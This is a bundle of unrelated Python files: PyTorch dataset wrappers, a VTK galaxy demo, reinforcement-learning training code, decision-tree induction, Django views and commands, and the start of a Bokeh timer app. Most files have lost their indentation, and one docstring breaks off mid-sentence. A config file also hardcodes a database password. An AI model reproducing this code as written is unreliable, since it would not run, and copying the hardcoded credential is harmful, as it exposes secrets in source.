self.mask = mask.byte()
if len(self.mask) != len(self.dataset):
raise TypeError("Length of mask and dataset must match.")
self.idxs = self.mask.nonzero().long().reshape(-1)
else: # don't mask anything
self.mask = torch.ones(len(self.dataset)).byte()
self.idxs = torch.arange(0, len(self.dataset)).long()
def __getitem__(self, idx):
data, target = self.dataset[self.idxs[idx]]
return data, target
def __len__(self):
return len(self.idxs)
# Wrapper class to return samples with sample idx
class IndexedDataset(Dataset):
def __init__(self, dataset):
self.dataset = dataset
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
return (idx, *self.dataset[idx])
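# --- Illustrative usage (not part of the original module) ---
# A minimal sketch of wrapping a dataset; TensorDataset stands in for any
# torch Dataset, and the mask/values below are made up for illustration.
if __name__ == "__main__":
    from torch.utils.data import TensorDataset

    data = torch.arange(10, dtype=torch.float32).unsqueeze(1)
    targets = torch.arange(10)
    base = TensorDataset(data, targets)

    keep = torch.tensor([1, 0, 1, 0, 1, 0, 1, 0, 1, 0])
    masked = MaskedDataset(base, mask=keep)   # keeps samples 0, 2, 4, 6, 8
    indexed = IndexedDataset(masked)          # prepends the (masked) index

    print(len(masked))    # 5
    print(indexed[0])     # (0, tensor([0.]), tensor(0))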
|
import vtk
import numpy as np
from netCDF4 import Dataset
import sys
sys.path.append('../framework/')
import framework
#********************* CODE SPECIFIC TO DEMO ********************************
#Data transfer object
class DTO:
def SetData(self,data):
self.Data=data
def GetData(self):
return self.Data
#class containing demo-specific functions
class galaxydemo(framework.abstractdemo):
# read in data and convert it to a data transfer object
def GetVTKData(self,root): #root=netcdf handle
#create numpy arrays
x=root.variables['x'][:]
y=root.variables['y'][:]
z=root.variables['z'][:]
n=x.size
#create vtk objects from numpy arrays
points=vtk.vtkPoints()
vertices = vtk.vtkCellArray()
#loop over points in data and add them to the vtkpoints and vtkvertices objects
for i in range(0,n):
id = points.InsertNextPoint(x[i],y[i],z[i])
vertices.InsertNextCell(1)
vertices.InsertCellPoint(id)
# Create a polydata object
galaxy = vtk.vtkPolyData()
# Set the points and vertices we created as the geometry and topology of the polydata
galaxy.SetPoints(points)
galaxy.SetVerts(vertices)
#create writer to write polydata to an xml string to be sent to main process
writer=vtk.vtkXMLPolyDataWriter()
writer.SetInputData(galaxy)
writer.WriteToOutputStringOn()
writer.Write()
xml=writer.GetOutputString()
#create data transfer object and put the xml string into it
data=DTO()
data.SetData(xml)
return data
# Renders a frame with data contained within the data transfer object, data
def RenderFrame(self,win,data):
#unpack xml string from data transfer object
xml=data.GetData()
#read in xml data
reader=vtk.vtkXMLPolyDataReader()
reader.ReadFromInputStringOn()
reader.SetInputString(xml)
reader.Update()
#update mapper
win.mapper.SetInputConnection(reader.GetOutputPort())
try: #does the actor exist? if not, create one
win.actor
except AttributeError:
win.actor=vtk.vtkActor()
win.renderer.AddActor(win.actor)
win.actor.SetMapper(win.mapper)
#update renderer
win.widget.GetRenderWindow().Render()
def GetFilename(self,num):
return "data/data%5.5d.nc"%num #get filename
#************************** END OF DEMO SPECIFIC CODE ******************************
#Launch demo
if __name__ == '__main__':
demo=galaxydemo()
framework.Start("Galaxy Simulator",demo)
|
import configargparse
import torch
import torch.optim as optim
from environments import CartPoleRegulatorEnv
from environments import CartEnv
from environments import AcrobotEnv
from models.agents import NFQAgent
from models.networks import NFQNetwork, ContrastiveNFQNetwork, ContrastiveLinearModel
# from simulated_fqi import NFQAgent
# from simulated_fqi import NFQNetwork, ContrastiveNFQNetwork
from util import get_logger, close_logger, load_models, make_reproducible, save_models
import matplotlib.pyplot as plt
import numpy as np
import itertools
from train_cnfqi import run
def run_lm(
verbose=True,
is_contrastive=False,
epoch=1000,
train_env_max_steps=100,
eval_env_max_steps=3000,
discount=0.95,
init_experience_bg=200,
init_experience_fg=200,
fg_only=False,
increment_experience=0,
hint_to_goal=0,
evaluations=5,
force_left=5,
random_seed=1234,
):
# Setup environment
bg_cart_mass = 1.0
fg_cart_mass = 1.0
train_env_bg = CartPoleRegulatorEnv(
group=0,
masscart=bg_cart_mass,
mode="train",
force_left=force_left,
is_contrastive=is_contrastive,
fg_only=fg_only,
)
train_env_fg = CartPoleRegulatorEnv(
group=1,
masscart=fg_cart_mass,
mode="train",
force_left=force_left,
is_contrastive=is_contrastive,
fg_only=fg_only,
)
eval_env_bg = CartPoleRegulatorEnv(
group=0,
masscart=bg_cart_mass,
mode="eval",
force_left=force_left,
is_contrastive=is_contrastive,
fg_only=fg_only,
)
eval_env_fg = CartPoleRegulatorEnv(
group=1,
masscart=fg_cart_mass,
mode="eval",
force_left=force_left,
is_contrastive=is_contrastive,
fg_only=fg_only,
)
# make_reproducible(random_seed, use_numpy=True, use_torch=True)
# train_env_bg.seed(random_seed)
# train_env_fg.seed(random_seed)
# eval_env_bg.seed(random_seed)
# eval_env_fg.seed(random_seed)
# Log to File, Console, TensorBoard, W&B
logger = get_logger()
# Setup agent
nfq_net = ContrastiveLinearModel(
state_dim=train_env_bg.state_dim, is_contrastive=is_contrastive
)
# optimizer = optim.Rprop(nfq_net.parameters())
if is_contrastive:
optimizer = optim.Adam(
itertools.chain(nfq_net.layers_shared.parameters()), lr=1e-1
)
else:
optimizer = optim.Adam(nfq_net.parameters(), lr=1e-1)
nfq_agent = NFQAgent(nfq_net, optimizer)
# NFQ Main loop
# A set of transition samples denoted as D
bg_rollouts = []
fg_rollouts = []
total_cost = 0
for _ in range(init_experience_bg):
rollout_bg, episode_cost = train_env_bg.generate_rollout(
None, render=False, group=0
)
bg_rollouts.extend(rollout_bg)
for _ in range(init_experience_fg):
rollout_fg, episode_cost = train_env_fg.generate_rollout(
None, render=False, group=1
)
fg_rollouts.extend(rollout_fg)
total_cost += episode_cost
# import ipdb; ipdb.set_trace()
bg_rollouts.extend(fg_rollouts)
all_rollouts = bg_rollouts.copy()
# bg_rollouts_test = []
# fg_rollouts_test = []
# if init_experience > 0:
# for _ in range(init_experience):
# rollout_bg, episode_cost = eval_env_bg.generate_rollout(
# None, render=False, group=0
# )
# rollout_fg, episode_cost = eval_env_fg.generate_rollout(
# None, render=False, group=1
# )
# bg_rollouts_test.extend(rollout_bg)
# fg_rollouts_test.extend(rollout_fg)
# bg_rollouts_test.extend(fg_rollouts)
# all_rollouts_test = bg_rollouts_test.copy()
# state_action_b, target_q_values, groups = nfq_agent.generate_pattern_set(all_rollouts_test)
# X_test = state_action_b
bg_success_queue = [0] * 3
fg_success_queue = [0] * 3
epochs_fg = 0
eval_fg = 0
# import ipdb; ipdb.set_trace()
for epoch in range(epoch + 1):
state_action_b, target_q_values, groups = nfq_agent.generate_pattern_set(
all_rollouts
)
X = state_action_b
if not nfq_net.freeze_shared:
loss = nfq_agent.train((state_action_b, target_q_values, groups))
eval_episode_length_fg, eval_success_fg, eval_episode_cost_fg = 0, 0, 0
if nfq_net.freeze_shared:
eval_fg += 1
if eval_fg > 50:
loss = nfq_agent.train((state_action_b, target_q_values, groups))
if is_contrastive:
# import ipdb; ipdb.set_trace()
if nfq_net.freeze_shared:
(
eval_episode_length_fg,
eval_success_fg,
eval_episode_cost_fg,
) = nfq_agent.evaluate(eval_env_fg, render=False)
for param in nfq_net.layers_fg.parameters():
assert param.requires_grad
for param in nfq_net.layers_shared.parameters():
assert not param.requires_grad
else:
for param in nfq_net.layers_fg.parameters():
assert not param.requires_grad
for param in nfq_net.layers_shared.parameters():
assert param.requires_grad
(
eval_episode_length_bg,
eval_success_bg,
eval_episode_cost_bg,
) = nfq_agent.evaluate(eval_env_bg, render=False)
else:
(
eval_episode_length_bg,
eval_success_bg,
eval_episode_cost_bg,
) = nfq_agent.evaluate(eval_env_bg, render=False)
(
eval_episode_length_fg,
eval_success_fg,
eval_episode_cost_fg,
) = nfq_agent.evaluate(eval_env_fg, render=False)
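# bg/fg_success_queue are 3-element sliding windows over the most recent
# evaluation outcomes; three consecutive successes freeze the shared layers
# (background) or stop training (foreground) below.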
# bg_success_queue.pop()
bg_success_queue = bg_success_queue[1:]
bg_success_queue.append(1 if eval_success_bg else 0)
fg_success_queue = fg_success_queue[1:]
fg_success_queue.append(1 if eval_success_fg else 0)
printed_bg = False
printed_fg = False
if sum(bg_success_queue) == 3 and not nfq_net.freeze_shared:
if epochs_fg == 0:
epochs_fg = epoch
printed_bg = True
nfq_net.freeze_shared = True
if verbose:
print("FREEZING SHARED")
if is_contrastive:
for param in nfq_net.layers_shared.parameters():
param.requires_grad = False
for param in nfq_net.layers_last_shared.parameters():
param.requires_grad = False
for param in nfq_net.layers_fg.parameters():
param.requires_grad = True
for param in nfq_net.layers_last_fg.parameters():
param.requires_grad = True
# else:
# for param in nfq_net.layers_fg.parameters():
# param.requires_grad = False
# for param in nfq_net.layers_last_fg.parameters():
# param.requires_grad = False
optimizer = optim.Adam(
itertools.chain(nfq_net.layers_fg.parameters()), lr=1e-1
)
nfq_agent._optimizer = optimizer
# break
# Print current status
if verbose:
logger.info(
# "Epoch {:4d} | Eval BG {:4d} / {:4f} | Eval FG {:4d} / {:4f} | Train Loss {:.4f}".format(
# epoch, eval_env_bg.success_step, eval_episode_cost_bg, eval_env_fg.success_step, eval_episode_cost_fg, loss
# )
"Epoch {:4d} | Eval BG {:4d} / {:4f} | Eval FG {:4d} / {:4f} | Train Loss {:.4f}".format(
epoch,
eval_episode_length_bg,
eval_episode_cost_bg,
eval_episode_length_fg,
eval_episode_cost_fg,
loss,
)
)
if sum(fg_success_queue) == 3:
printed_fg = True
if verbose:
logger.info(
"Epoch {:4d} | Total Cycles {:6d} | Total Cost {:4.2f}".format(
epoch, len(all_rollouts), total_cost
)
)
break
eval_env_bg.step_number = 0
eval_env_fg.step_number = 0
eval_env_bg.max_steps = 1000
eval_env_fg.max_steps = 1000
performance_fg = []
performance_bg = []
num_steps_bg = []
num_steps_fg = []
total = 0
for it in range(evaluations):
# eval_env_bg.save_gif = True
print("BG")
(
eval_episode_length_bg,
eval_success_bg,
eval_episode_cost_bg,
) = nfq_agent.evaluate(eval_env_bg, True)
# eval_env_bg.create_gif()
if verbose:
print(eval_episode_length_bg, eval_success_bg)
num_steps_bg.append(eval_episode_length_bg)
performance_bg.append(eval_episode_length_bg)
total += 1
train_env_bg.close()
eval_env_bg.close()
# eval_env_fg.save_gif = True
print("FG")
(
eval_episode_length_fg,
eval_success_fg,
eval_episode_cost_fg,
) = nfq_agent.evaluate(eval_env_fg, render=True)
# eval_env_fg.create_gif()
if verbose:
print(eval_episode_length_fg, eval_success_fg)
num_steps_fg.append(eval_episode_length_fg)
performance_fg.append(eval_episode_length_fg)
total += 1
train_env_fg.close()
eval_env_fg.close()
print("Fg trained after " + str(epochs_fg) + " epochs")
print("BG stayed up for steps: ", num_steps_bg)
print("FG stayed up for steps: ", num_steps_fg)
return performance_bg, performance_fg
if __name__ == "__main__":
import json
num_iter = 10000
results = {}
results["linear_model"] = []
# results["nfqi"] = []
results = {}
for i in range(0, 11):
results[i] = {}
results[i]["cfqi"] = {}
results[i]["fqi"] = {}
results[i]["warm_start"] = {}
results[i]["tl"] = {}
for i in range(num_iter):
for f in range(0, 11):
# Linear model
performance_bg, performance_fg = run_lm(
is_contrastive=False,
init_experience_bg=200,
init_experience_fg=200,
fg_only=False,
force_left=0,
epoch=200,
verbose=True,
)
results[f]["cfqi"][i] = (performance_fg, performance_bg)
# import ipdb; ipdb.set_trace()
with open("linear_model_force_range.json", "w") as f:
json.dump(results, f)
|
b = 10
c = 20
a = b + c
print(a)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 2 21:37:34 2020
@author: Weifan Chen, Diala @ Boston University
A fast demo of the guided-induction decision tree.
Similarity matrix meaning: entry m_ij is the similarity score between class i and
class j (so the matrix is symmetric). If i and j are mutual best matches, then m_ij
should be the largest entry in the cross centered at (i, j), not counting the
self-similarity entries m_ii and m_jj, which are the largest of all.
Result:
For the CIFAR10 dataset and a pretrained WideResNet28 model (a pure pretrained
model, without any interference from NBDT), the guided induction algorithm
gives the same structure as WordNet, with the sole exception of
"""
from operator import itemgetter
import numpy as np
import nbdt
import networkx as nx
'''
Node represents a node in the NBDT
Attribute:
index: as identifier of each class, only on the leaf nodes layer, the index rep the real class label.
for intermediate node, the index should also give the correct weights by matrix[index,:]
depth: leaf nodes have depth==0, incremented by 1 for each induced layer. Caveat: a node may increase its
depth without being paired (it moves to the next layer by itself, without being induced with another node)
weight: it's associate weight, the number of entry should equal to the number of output nodes from the backbone DNN
this should equal to matrix[index,:]
children: the previous layer sub node derived from this node
parent: node
matrix: the weight matrix that serves a similar role as the starting big matrix. Semantically this is quite different from
a weight matrix in dnn
best_match: tuple consisting of node index and similarity value between this node and its best match
(new) terminals: list of Node, to calculate the similarity between two trees, each intermediate node needs
the information of all the leaves (terminals) branched from it (the root of the substree)
(new) isLeaf: bool :
(new) isTransit: bool: if a node has only one child, then this node is transit. Leaf nodes are also
transit, since we don't want them to participate in the tree-similarity calculation
Method:
calc_weight (static) : this could be used by a parent to get its weights by passing its children to this method
'''
# TODO: consider wnids instead of index
# TODO: then we can use wnid_to_node to create Node objects
# TODO: num_classes needed in TreeSupLoss
# TODO: test passing the Graph to TreeSupLoss class / SoftNBDT
class Node():
def __init__(self, index, depth, weight, *children, name=None, formal_name=None, parent=None, matrix=None,
matches=None, best_match=None, wnid=None):
self.index = index
self.depth = depth
self.weight = weight
self.matrix = matrix
self.children = children
self.name = name
self.parent = parent
self.matches = matches
self.best_match = best_match
self.terminals = [] ## a leaf holds itself as an entry, so parents can get theirs by concatenating all their children's terminals
self.isLeaf = False
self.isTransit = False
self.wnid = wnid
self.formal_name = None
def __len__(self):
return len(self.children)
def __eq__(self, other):
return self.name == other.name
def __str__(self):
return self.name
def __hash__(self):
return hash(str(self))
def set_isLeaf_true(self):
self.isLeaf = True
def set_isTransit_true(self):
self.isTransit = True
@staticmethod
def calc_weight(nodes, method='average'):
weights = np.array([node.weight for node in nodes])
if method == 'average':
return np.average(weights, axis=0)
'''
Method for building the leaf node of NBDT
Params:
matrix: the very last weight matrix of the pretrained model
depth: should always be zero, since this method is only used for building the leaf layer
classes: list of names for each label
'''
def build_leaf_nodes(matrix, metric, depth=0, classes=None, wnids=None, verbose=1):
# get the similarity matrix
if verbose > 0: print('build_leaf_nodes called')
simi_mat = simi_matrix(matrix, metric)
if verbose > 0: print('simi mat generate done')
# create nodes
nodes = []
for i in range(0, matrix.shape[0]):
if verbose > 0: print('start create node ', i)
node = Node(i, depth, matrix[i, :].numpy().copy(), None, matrix=matrix, matches=simi_mat[i])
if classes is not None:
node.name = classes[i]
node.formal_name = classes[i]
if wnids is not None: node.wnid = wnids[i]
node.matches = set()
nodes.append(node)
# compute matches for each node
for i in range(len(simi_mat)):
if verbose > 0: print('compute match, ', i)
mask = np.zeros(simi_mat[i].size, dtype=bool)
mask[i] = True
masked = np.ma.array(simi_mat[i], mask=mask)
j = masked.argmax()
value = masked.max()
nodes[i].matches.add((j, value))
nodes[j].matches.add((i, value))
[node.set_isLeaf_true() for node in nodes]
[node.set_isTransit_true() for node in nodes]
[node.terminals.append(node) for node in nodes]
return nodes
"""
*** Method for user ***
build the entire hierarchy
Param:
model: the pretrained model
metric (callable) to calculate the similarity between two class
TODO: extend the metric for multi class
classes: list of names for each class
method: how to calculate the node weight
avail args: 'average' : use the average node weight from all its children
policy: how to deal with nodes that do not have mutual best match
avail args: 'wait' : unpaired node would become parent of itself, nothing changes
"""
def build_full(w, b, metric, classes=None, wnids=None, method='average', policy='wait', verbose=0):
# try:
# w = model['fc.weight'].numpy() ## TODO: this part could update according to alvin's implementation
# b = model['fc.bias'].numpy()
# except: # if model has been loaded from checkpoint
# w = model['module.fc.weight'].cpu().numpy()
# b = model['module.fc.bias'].cpu().numpy()
print('building starts...')
print('shape of the output layer: ', w.shape)
G = nx.DiGraph()
nodes = build_leaf_nodes(w, metric, classes=classes, wnids=wnids, verbose=verbose)
if verbose > 0: print('build leaf done.')
for n in nodes:
G.add_node(n)
nodes_temp = nodes
n_nodes = len(nodes)
while True:
if verbose > 0: print('call init_next_layer')
nodes, mat, G = init_next_layer(G, nodes_temp, metric, method=method, policy=policy)
if len(nodes) == 1 or len(nodes) == n_nodes:
print('induction done with ', len(nodes), ' root nodes.')
return G, nodes
n_nodes = len(nodes)
nodes_temp = nodes
'''
Output a list of induced node and the weight matrix for the newly generated layers.
The output could be the new input for the method, until reducing to only one node or
model does not converge anymore.
Params:
nodes: list of nodes to be induced on
metric (callable) : rule to compute similarity
Return:
new_nodes: list of nodes for induction layer
new_matrix: a finished big matrix used by induction nodes
'''
def init_next_layer(G, nodes, metric, method='average', policy='wait', verbose=0):
# step 1 : get variables needed for build induction node
cur_depth = nodes[0].depth
matrix = nodes[0].matrix
pairs, singles = get_pairs(matrix, metric)
assert len(pairs) * 2 + len(singles) == matrix.shape[0], 'this should add up'
if policy == 'wait':
class_n = matrix.shape[0] - len(
pairs)  ## implicitly, two nodes induce one parent, or a node is left over: total - 2*n_pairs + n_pairs
new_matrix = np.zeros((class_n, matrix.shape[1])) ## each new parent should hold a reference of this matrix
elif policy == 'wait-match':
from math import ceil
new_matrix = np.zeros(
(ceil(matrix.shape[0] / 2), matrix.shape[1])) ## this is the ceil of division by 2 , ceil(5/2) = 3
"""
BUG: the bug should be here somewhere, since right now this calculation does not hold:
singles are somehow also paired, so the matrix has the wrong dimensions along axis=0
"""
index = 0
new_nodes = []
# step 2 : for those have mutual best match nodes, instantiate their parent
for pair in pairs:
children = _pair_to_nodes(nodes, pair)
parent = Node(index, cur_depth + 1, None, *children, matrix=new_matrix)
[parent.terminals.extend(child.terminals) for child in children] ## add terminal info to parent
parent.wnid = ''.join([child.wnid for child in parent.children])
parent.weight = Node.calc_weight(parent.children, method)
parent_name = ''
for child in children:
child.parent = parent
parent_name += child.name + '-'
parent.formal_name = '(' + ','.join([child.formal_name for child in children]) + ')'
parent.name = parent_name
new_nodes.append(parent)
G.add_node(parent)
for i in children: G.add_edge(parent, i) # this is a directed edge
index += 1
# step 3 : for those unpaired, based on policy, to decide how to connect them
if verbose > 0:
print('at depth ', cur_depth, ', ', len(singles), ' unpaired nodes.')
if policy == 'wait':
# Not creating new node, simply pass the old node to the new layer, otherwise G would be disconnected
for n in singles:
child = nodes[n]
child.index = index
child.depth = cur_depth + 1
child.matrix = new_matrix
new_nodes.append(child)
index += 1
# a new policy, based on the observation that each sub-matrix contains at least one mutual best match (although this is not proved)
elif policy == 'wait-match':
# step 1: use all the singles weight to create the sub matrix
# step 2: use get_pairs to form a merge
# step 3: build parents as necessary
# step 4: repeat until there is nothing left or only one remains
while (len(singles) > 1):
weights = [nodes[n].weight for n in singles]
mat = np.stack(weights, axis=0)
## reindex the nodes here
t_node = [nodes[n] for n in singles]
nodes = t_node
pairs, singles = get_pairs(mat, metric)
assert len(pairs) * 2 + len(singles) == mat.shape[0], 'this should add up'
## same code from the starting init_next_layer, with modification, since we need to concat the existing new_matrix
for pair in pairs:
children = _pair_to_nodes(nodes, pair)
parent = Node(index, cur_depth + 1, None, *children, matrix=new_matrix)
[parent.terminals.extend(child.terminals) for child in children] ## add terminal info to parent
parent.wnid = ''.join([child.wnid for child in parent.children])
parent.weight = Node.calc_weight(parent.children, method)
parent_name = ''
for child in children:
child.parent = parent
parent_name += child.name + '-'
parent.formal_name = '(' + ','.join([child.formal_name for child in children]) + ')'
parent.name = parent_name
new_nodes.append(parent)
G.add_node(parent)
for i in children: G.add_edge(parent, i) # this is a directed edge
index += 1
if len(singles) == 1:
child = nodes[singles[0]]
child.index = index
child.depth = cur_depth + 1
child.matrix = new_matrix
new_nodes.append(child)
index += 1
elif policy == 'match':
# new_mat = nodes[singles[0]].matrix
if len(singles) > 1:
children = [nodes[i] for i in singles]
# print(simi_mat)
# get best match for each single
for n in singles:
## WF: if all singles are at the same depth, their .matrix should be the same, so this can move outside the for loop
simi_mat = simi_matrix(nodes[n].matrix, metric)
mask = np.zeros(len(simi_mat[n]), dtype=bool)
mask[n] = True
masked = np.ma.array(simi_mat[n], mask=mask)
j = masked.argmax()
value = masked.max()
nodes[n].best_match = (j, value)
nodes[n].matches.remove(nodes[n].best_match)
print(nodes[n].matches)
# now update similarities of the other matching classes
for cls, val in nodes[n].matches:
excluded = nodes[cls].matches - {(cls, val)}
print(excluded)
cls_simi = [(cls1, min(val, val1)) for cls1, val1 in excluded]
# print("matching %d with %s" % (cls, cls_simi))
nodes[cls].matches = {max(cls_simi, key=itemgetter(1))}
print(nodes[cls].__str__(), nodes[cls].best_match[0])
parent = Node(index, cur_depth + 1, None, [nodes[cls], nodes[n]], matrix=new_matrix)
parent.weight = Node.calc_weight(parent.children, method)
parent_name = ''
for child in children:
child.parent = parent
parent_name += child.name + '-'
parent.name = parent_name
G.add_node(parent)
new_nodes.append(parent)
for i in children:
G.add_edge(parent, i)
# step 4: use parents' weight to fill up the bigger matrix
for i, parent in enumerate(new_nodes):
new_matrix[i, :] = parent.weight.reshape(1, new_matrix.shape[1])
return new_nodes, new_matrix, G
def _pair_to_nodes(nodes, pair):
return [nodes[index] for index in pair]
'''
parameter:
w: np.array for the weight matrix,
clas1, clas2 are index of the class
metric (callable) the function map to the weight pairs
e.g. input a_i conects class1 and class2 by two weights, the
metric would output a number based on this two value,
the returned value should be a indication of the similarity
between the two classes from the perspective of input a_i
return: similarity score between cls1 and cls2
'''
def simi(w, cls1, cls2, metric):
"""it metric as a method only used here, so we can savely make it a string and use accordingly"""
v1, v2 = w[cls1,:], w[cls2,:]
if metric == 'naive':
metric = naive
return sum(map(metric, list(zip(w[cls1, :], w[cls2, :]))))
elif metric == 'l1':
return np.average(abs(v1-v2))
elif metric == 'l2':
return np.average((v1-v2)**2)
elif metric == 'cos':
return np.average(v1*v2)
elif metric == 'euc':
return np.sqrt(sum((v1-v2)**2))
elif metric == 'poincare':
return np.arccosh(1 + 2*np.linalg.norm(v1-v2)*np.linalg.norm(v1-v2)/( (1-np.linalg.norm(v1)*np.linalg.norm(v1)) * (1-np.linalg.norm(v2)*np.linalg.norm(v2)) ))
else:
raise AttributeError('unknown metric ', metric)
'''
The callable for metric in simi
if both weights are positive, we take the smaller one
if the two weights have different signs, we take the negative of the absolute value of their difference
otherwise, return 0
TODO: try more metric callable to see which has better meaning
'''
def naive(pair):
x, y = pair
if x >= 0 and y >= 0:
return min(x, y)
elif x * y <= 0:
return -np.abs(x - y)
else:
return 0
'''
Param:
w: np.array of the weight matrix
metric: the callable
Return:
the similarity weight matrix (np.array)
the value m_ij is the similarity score between class i and j
the matrix is symmetric by definition
the diagonal entry should be the largest along its row and column
TODO:
1. normalization?
'''
def simi_matrix(w, metric):
# print('simi matrix called')
n = w.shape[0]
# print('n: ', n)
mat = np.zeros((n, n))
# print('mat shape: ', mat.shape)
for i in range(0, n):
for j in range(0, n):
mat[i, j] = simi(w, i, j, metric)
return mat
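'''
Param:
mat: a (symmetric) similarity matrix
Return:
hot_mat: boolean matrix whose entry (i, j) is True iff classes i and j are mutual
best (non-self) matches; the diagonal is excluded by filling it with -inf
col_mat, row_mat: the per-column and per-row argmax indicator matrices used to build hot_mat
'''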
def resmat(mat):
mat_cpy = mat.copy()
col_mat = np.zeros(mat.shape)
row_mat = np.zeros(mat.shape)
np.fill_diagonal(mat_cpy, np.NINF)
indice_col = np.argmax(mat_cpy, axis=0)
indice_row = np.argmax(mat_cpy, axis=1)
for i in range(0, col_mat.shape[0]):
col_mat[indice_col[i], i] = 1
row_mat[i, indice_row[i]] = 1
return np.logical_and(col_mat, row_mat), col_mat, row_mat
def induce_pairs(hot_mat):
x, y = np.where(np.tril(hot_mat) == 1)
pairs = [pair for pair in zip(x, y)]
assert len(pairs) == hot_mat.sum() / 2, 'unmatched pair'
indice = [index for pair in pairs for index in pair]
singles = []
for i in range(0, hot_mat.shape[0]):
if i not in indice:
singles.append(i)
return pairs, singles
'''
This method is a pipline of the previous three, given the big matrix and metric,
output the best match pairs indice, and index of node that are not paired
'''
def get_pairs(w, metric):
hot_mat, _, _ = resmat(simi_matrix(w, metric))
return induce_pairs(hot_mat)
def build_Gw_from_Gn(
Gn): ## build G_wnid from G_node, wnid is only for leaf node and other edge tracking. The label would be replaced by Node.formal_name
Gw = nx.DiGraph()
d = {}
for node in list(Gn.nodes):
d[node.wnid] = node.formal_name
[Gw.add_edge(list(edge)[0].wnid, list(edge)[1].wnid) for edge in list(Gn.edges)]
nx.set_node_attributes(Gw, d, 'label')
return Gw
def display_tree(start_node, verbose=0):
visited = []
queue = []
root = start_node[0]
visited.append(root)
queue.append(root)
while queue:
s = queue.pop(0)
assert s
print(s.depth, s.index, s.name)
if verbose > 0:
print(s.formal_name)
print(s.wnid, '\n')
if s.children[0] is None: ## reaching the leaf, leaf.children = (None,)
continue
for i in s.children:
if i not in visited:
visited.append(i)
queue.append(i)
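# --- Illustrative usage (not part of the original module) ---
# A minimal sketch of the pairing step on a random weight matrix, using only the
# helpers defined above; the shape and the 'naive' metric choice are illustrative.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    w = rng.normal(size=(6, 16))            # 6 "classes", 16-dimensional weights
    pairs, singles = get_pairs(w, 'naive')  # mutual-best-match pairs + leftover classes
    print('pairs:  ', pairs)
    print('singles:', singles)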
|
# -*- coding: utf-8 -*-
"""Run a python file within your Django app environment.
Example:
python manage.py run script.py
You can also pass arguments to the file using the following syntax:
python manage.py run script.py:"some_argument --another-argument=something"
"""
import runpy
import sys
import operator
from os import path
from django.core.management.base import BaseCommand, CommandError
def run(filename, args):
if hasattr(args, "split"):
args = args.split()
sys.argv = [filename] + args
runpy.run_path(filename, globals(), run_name="__main__")
class Command(BaseCommand):
args = '<filename:"arg ..." ...>'
help = __doc__
def handle(self, *args, **options):
if not args:
raise CommandError("You must specify at least a python file path to execute.")
args = map(operator.methodcaller("split", ":"), args)
for arg in args:
try:
filename, filename_args = arg
except ValueError:
filename, = arg
filename_args = ""
if not path.isfile(filename):
raise CommandError("{!r} is not a valid file path.".format(filename))
run(filename, filename_args)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from django.http import HttpResponse
from .models import Business, Community, Resident, Comment  # Comment is used by the comments() view below
from django.contrib.auth.decorators import login_required
from .forms import NewBusinessForm, NewCommunityForm, NewCommentForm
from django.contrib.auth.models import User
def welcome(request):
community = Community.objects.all()
return render(request,'home.html',{"community": community})
def businesses(request, hood_id):
business = Business.objects.filter(community_id=hood_id)
print([x.details for x in business])
return render(request,'businesses.html',{"business": business})
def residents(request):
residents = Resident.objects.all()
return render(request,'residents.html',{"residents":residents})
def comments(request):
comments = Comment.objects.all()
return render(request,'businesses.html',{"comments":comments})
@login_required(login_url='/accounts/login/')
def new_business(request):
current_user = request.user
if request.method =='POST':
form = NewBusinessForm(request.POST, request.FILES)
if form.is_valid():
business = form.save(commit=False)
business.resident = current_user
business.save()
return redirect('welcome')
else:
form = NewBusinessForm()
return render(request, 'new_business.html', {"form":form})
@login_required(login_url='/accounts/login/')
def new_community(request):
current_user = request.user
if request.method =='POST':
form = NewCommunityForm(request.POST, request.FILES)
if form.is_valid():
community = form.save(commit=False)
community.resident = current_user
community.save()
return redirect('welcome')
else:
form = NewCommunityForm()
return render(request, 'new_community.html', {"form":form})
@login_required(login_url='/accounts/login/')
def new_comment(request):
current_user = request.user
if request.method =='POST':
form = NewCommentForm(request.POST, request.FILES)
if form.is_valid():
community = form.save(commit=False)
community.resident = current_user
community.save()
return redirect('welcome')
else:
form = NewCommentForm()
return render(request, 'newcomments.html', {"form":form})
|
#!/usr/bin/python3
DATABASE_NAME = 'epytodo'
DATABASE_HOST = 'localhost'
DATABASE_SOCK = '/var/lib/mysql/mysql.sock'
DATABASE_USER = 'lucas'
DATABASE_PASS = 'secretpass'
|
def FeatureExtractor(framework='keras', net='VGG16', layer='default', weights='imagenet', size=None, cuda=False, config=None):
if config is not None:
framework = config.features.framework
net = config.features.net
weights = config.features.weights
cuda = config.gpu
if framework == 'keras' or framework == 'tf':
from feature_extractor_tf import FeatureExtractor as FeatureExtractorTF
return FeatureExtractorTF(net=net, weights=weights)
if framework == 'pytorch':
from feature_extractor_pytorch import FeatureExtractor as FeatureExtractorPyTorch
return FeatureExtractorPyTorch(net=net, cuda=cuda)
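# --- Illustrative usage (not part of the original module) ---
# A minimal sketch of calling the factory above; the argument values are
# illustrative, and the backing feature_extractor_tf / feature_extractor_pytorch
# modules are assumed to be importable.
#
#   extractor = FeatureExtractor(framework='pytorch', net='VGG16', cuda=False)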
|
from src.tindeq import TindeqProgressor
from src.analysis import analyse_data
import time
import numpy as np
import asyncio
import tornado
from bokeh.server.server import Server
from bokeh.application import Application
from bokeh.application.handlers.function import FunctionHandler
from bokeh.plotting import figure, ColumnDataSource
from bokeh.layouts import row, column
from bokeh.models import Button, Slider, Div, Band, Whisker
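# The four classes below form a small timer state machine driving the test:
# Idle -> 10 s countdown -> repeated 7 s Go / 3 s Rest cycles (one rep each)
# -> back to Idle when the test is done. Each state exposes update(parent),
# which refreshes the timer Div, and end(parent), which advances the state.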
class IdleState:
bkg = 'orange'
@staticmethod
def update(parent):
parent.div.style['background-color'] = parent.state.bkg
parent.div.text = '10:00'
@staticmethod
def end(parent):
parent.state_start = time.time()
parent.state = CountDownState
class CountDownState:
bkg = 'orange'
duration = 10
@staticmethod
def update(parent):
# count down timer
elapsed = time.time() - parent.state_start
remain = CountDownState.duration - elapsed
fs = int(10 * (remain - int(remain)))
secs = int(remain)
parent.div.text = f"{secs:02d}:{fs:02d}"
parent.div.style['background-color'] = parent.state.bkg
if elapsed > CountDownState.duration:
CountDownState.end(parent)
@staticmethod
def end(parent):
parent.state_start = time.time()
parent.state = GoState
class GoState:
bkg = 'green'
duration = 7
@staticmethod
def update(parent):
# count down timer
